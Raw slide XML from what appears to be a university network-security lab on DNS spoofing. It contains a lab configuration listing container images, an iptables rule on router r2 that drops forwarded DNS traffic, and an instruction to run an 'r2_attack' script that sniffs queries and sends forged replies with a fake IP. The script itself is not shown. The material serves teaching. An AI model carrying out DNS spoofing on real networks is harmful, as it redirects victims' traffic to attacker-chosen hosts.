          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0251C8F-6025-EE4F-2502-C129383D1684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E206F36A-2489-09DA-D4E4-2994C8D4D6A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21832864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CEA8D-BB13-0732-E3A4-197742DC1C70}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2917944-B2C4-25D4-5C1D-FD0663211E6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iptables command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC64C4C-F393-96F3-6238-9F874F7AE2DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on r2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>block incoming DNS traffic in r2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>look at eth and loopback interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5869CAF-6552-2D69-8FB6-2B490B6EFA9D}"/>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5BCBBA97-ECA6-E877-D834-EF6CBB824ED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7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1921F717-00CB-70B8-D732-C3893F9A1182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2217485" y="3133725"/>
            <a:ext cx="7757030" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD08C6FE-B499-342F-B3D7-8ABDA50FF447}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="257206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sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968AA842-DC54-6390-8193-9121FBC857C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506"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r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82AA5D9E-ACB0-BFB3-1E84-0FF99503DF8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E07AAB-76C2-F569-0EE9-7DE9367FEB98}"/>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2" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28433CED-8AA4-8C17-C73C-363A0ED6A55C}"/>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3" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4DE48A9-68F2-4683-1021-DD817ABAB07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2824541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8222C-EC04-6F60-0CBA-D5B48CAD2446}"/>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BA0A9538-7C78-E206-382A-6CCB897F843D}"/>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55B831B4-EC8F-5540-F9C6-451BB8688017}"/>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74FDC1B7-D387-3BF3-0110-181991D9147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CF196EA4-E0A0-8A9E-08FC-C9B982233A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A22F35FF-3353-A1F4-C847-C384BAFE352E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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pc1[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>handsonsecurity</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seed-server:apache-php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280A1B1C-3020-C83C-FCA3-1936C1AE3DCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01221F5B-3C6E-D375-C42C-6C612AF4977B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8236032" y="2965847"/>
            <a:ext cx="3470176" cy="463153"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62802"/>
              <a:gd name="adj2" fmla="val 15736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image for the PHP language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27921117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AE8E5-B6FA-3E5C-0D4F-8DFEDF74248E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1AB8260-6A9D-DB92-8C94-08B510258628}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run Python script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5648EE39-F7AD-53CD-0778-538F87D04B7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run the r2_attack script to sniff the traffic and then send the packet with the fake IP address to the client who made the query.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CC7DB5-B74B-DEE6-4DBF-B680E26CD383}"/>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C0A59D58-AFB9-9A1D-A32B-C763EEA25C1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5" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F403AE21-718D-BDDA-35EF-4EDA7386659B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1832189" y="3464424"/>
            <a:ext cx="8527621" cy="2683937"/>
            <a:chOff x="4868024" y="2378845"/>
            <a:chExt cx="6736490" cy="2064838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EF2580D-0CDC-2D60-0531-DF232F1D845A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868025" y="2659116"/>
              <a:ext cx="6736489" cy="1784567"/>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sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
